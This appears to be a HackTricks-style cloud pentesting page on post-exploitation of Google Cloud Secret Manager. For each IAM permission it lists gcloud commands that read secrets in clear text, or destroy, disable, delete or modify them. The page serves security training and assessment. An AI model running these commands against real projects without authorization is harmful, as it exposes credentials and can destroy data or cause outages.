GCP - Secretmanager Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
Secretmanager
For more information about Secret Manager check:
{{#ref}}
../gcp-services/gcp-secrets-manager-enum.md
{{#endref}}
secretmanager.versions.access
This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
Access secret version
# Get clear-text of version 1 of secret: "<secret name>"
gcloud secrets versions access 1 --secret="<secret_name>"
secretmanager.versions.destroy
The secretmanager.versions.destroy permission allows an identity to permanently destroy (mark as irreversibly deleted) a specific version of a secret in Secret Manager, which could enable the removal of critical credentials and potentially cause denial of service or prevent the recovery of sensitive data.
gcloud secrets versions destroy <VERSION> --secret="<SECRET_NAME>" --project=<PROJECTID>
secretmanager.versions.disable
The secretmanager.versions.disable permission allows an identity to disable active secret versions in Secret Manager, temporarily blocking their use by applications or services that depend on them.
gcloud secrets versions disable <VERSION> --secret="<SECRET_NAME>" --project=<PROJECTID>
secretmanager.secrets.delete
The secretmanager.secrets.delete permission set allows an identity to completely delete a secret and all of its stored versions in Secret Manager.
gcloud secrets delete <SECRET_NAME> --project=<PROJECT_ID>
secretmanager.secrets.update
The secretmanager.secrets.update permission allows an identity to modify a secretβs metadata and configuration (for example, rotation settings, version policy, labels, and certain secret properties).
gcloud secrets update SECRET_NAME \
--project=PROJECT_ID \
--clear-labels \
--rotation-period=DURATION
{{#include ../../../banners/hacktricks-training.md}}